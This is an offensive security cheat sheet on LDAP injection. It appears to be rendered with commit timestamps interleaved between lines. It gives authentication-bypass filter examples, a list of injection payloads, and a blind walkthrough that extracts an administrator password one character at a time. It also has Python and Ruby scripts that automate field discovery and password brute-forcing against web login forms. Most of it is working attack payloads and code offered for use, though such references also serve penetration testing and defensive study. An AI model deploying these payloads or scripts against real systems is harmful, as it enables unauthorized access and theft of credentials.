2022-10-12 10:13:55 +00:00
# LDAP Injection
2018-08-12 21:30:22 +00:00
2021-07-04 11:32:32 +00:00
> LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
## Summary
* [Exploitation ](#exploitation )
* [Payloads ](#payloads )
* [Blind Exploitation ](#blind-exploitation )
* [Defaults attributes ](#defaults-attributes )
* [Exploiting userPassword attribute ](#exploiting-userpassword-attribute )
* [Scripts ](#scripts )
* [Discover valid LDAP fields ](#discover-valid-ldap-fields )
* [Special blind LDAP injection ](#special-blind-ldap-injection )
2017-07-14 21:40:31 +00:00
## Exploitation
2018-08-12 21:30:22 +00:00
2018-03-23 12:53:53 +00:00
Example 1.
2018-08-12 21:30:22 +00:00
```sql
2017-07-14 21:40:31 +00:00
user = *)(uid=* ))(|(uid=*
pass = password
2021-07-04 11:32:32 +00:00
query = (& (uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))
2017-07-14 21:40:31 +00:00
```
2018-03-23 12:53:53 +00:00
Example 2
2018-08-12 21:30:22 +00:00
```sql
2018-03-23 12:53:53 +00:00
user = admin)(!(& (1=0
pass = q))
query = (& (uid=admin)(!(& (1=0)(userPassword=q))))
```
2017-07-14 21:40:31 +00:00
## Payloads
2018-08-12 21:30:22 +00:00
```text
2017-07-14 21:40:31 +00:00
*
*)(&
*))%00
2018-11-02 12:50:56 +00:00
)(cn=))\x00
2017-07-14 21:40:31 +00:00
*()|%26'
*()|& '
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
```
## Blind Exploitation
2018-08-12 21:30:22 +00:00
2017-07-14 21:40:31 +00:00
We can extract using a bypass login
2018-08-12 21:30:22 +00:00
```sql
2017-07-14 21:40:31 +00:00
(& (sn=administrator)(password=*)) : OK
(& (sn=administrator)(password=A*)) : KO
(& (sn=administrator)(password=B*)) : KO
...
(& (sn=administrator)(password=M*)) : OK
(& (sn=administrator)(password=MA*)) : KO
(& (sn=administrator)(password=MB*)) : KO
...
(& (sn=administrator)(password=MY*)) : OK
(& (sn=administrator)(password=MYA*)) : KO
(& (sn=administrator)(password=MYB*)) : KO
(& (sn=administrator)(password=MYC*)) : KO
...
(& (sn=administrator)(password=MYK*)) : OK
(& (sn=administrator)(password=MYKE)) : OK
```
2018-10-31 21:34:10 +00:00
## Defaults attributes
Can be used in an injection like `*)(ATTRIBUTE_HERE=*`
```bash
userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName
```
## Exploiting userPassword attribute
2018-11-02 12:50:56 +00:00
`userPassword` attribute is not a string like the `cn` attribute for example but it’ s an OCTET STRING
2018-10-31 21:34:10 +00:00
In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).
> octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.
```bash
userPassword:2.5.13.18:=\xx (\xx is a byte)
userPassword:2.5.13.18:=\xx\xx
userPassword:2.5.13.18:=\xx\xx\xx
```
2020-02-21 22:19:48 +00:00
## Scripts
### Discover valid LDAP fields
```python
#!/usr/bin/python3
import requests
import string
fields = []
url = 'https://URL.com/'
2024-09-16 16:05:54 +00:00
f = open('dic', 'r') #Open the worldists of common attributes
world = f.read().split('\n')
2020-02-21 22:19:48 +00:00
f.close()
2024-09-16 16:05:54 +00:00
for i in world:
2020-02-21 22:19:48 +00:00
r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (& (login=*)(ITER_VAL=*))\x00)(password=bla))
if 'TRUE CONDITION' in r.text:
fields.append(str(i))
print(fields)
```
Ref. [5][5]
2021-07-04 11:32:32 +00:00
### Special blind LDAP injection (without "*")
2020-02-21 22:19:48 +00:00
```python
#!/usr/bin/python3
import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
2020-02-21 22:49:50 +00:00
r = requests.get("http://ctf.web?action=dir& search=admin*)(password=" + flag + char)
2020-02-21 22:19:48 +00:00
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break
```
Ref. [5][5]
2020-02-21 22:49:50 +00:00
```ruby
#!/usr/bin/env ruby
require 'net/http'
alphabet = [*'a'..'z', *'A'..'Z', * '0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('')
flag = ''
(0..50).each do |i|
puts("[i] Looking for number #{i}")
alphabet.each do |char|
r = Net::HTTP.get(URI("http://ctf.web?action=dir& search=admin*)(password=#{flag}#{char}"))
if /TRUE CONDITION/.match?(r)
flag += char
puts("[+] Flag: #{flag}")
break
end
end
end
```
By [noraj ](https://github.com/noraj )
2020-02-21 22:19:48 +00:00
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2017-07-14 21:40:31 +00:00
* [OWASP LDAP Injection ](https://www.owasp.org/index.php/LDAP_injection )
* [LDAP Blind Explorer ](http://code.google.com/p/ldap-blind-explorer/ )
2020-09-09 07:57:21 +00:00
* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN ](https://0xukn.fr/posts/writeupecw2018admyssion/ )
2020-02-21 22:19:48 +00:00
* [Quals ECW 2018 - Maki ](https://maki.bzh/courses/blog/writeups/qualecw2018/ )
2020-09-09 07:57:21 +00:00
* [How To Manage and Use LDAP Servers with OpenLDAP Utilities ](https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities )
* [How To Configure OpenLDAP and Perform Administrative LDAP Tasks ](https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks )
2020-09-09 10:15:07 +00:00
* SSH key authentication via LDAP
- [How to setup LDAP server for openssh-lpk ](https://openssh-ldap-pubkey.readthedocs.io/en/latest/openldap.html )
- [openssh-lpk.ldif ](https://github.com/Lullabot/openldap-schema/blob/master/openssh-lpk.ldif )
- [Setting up OpenLDAP server with OpenSSH-LPK on Ubuntu 14.04 ](https://blog.shichao.io/2015/04/17/setup_openldap_server_with_openssh_lpk_on_ubuntu.html )
- [SSH key authentication using LDAP ](https://serverfault.com/questions/653792/ssh-key-authentication-using-ldap )
- [FR] [SSH et LDAP ](https://wiki.lereset.org/ateliers:serveurmail:ldap-ssh )
2021-07-04 11:32:32 +00:00
- [SSH Public Keys in OpenLDAP ](http://pig.made-it.com/ldap-openssh.html )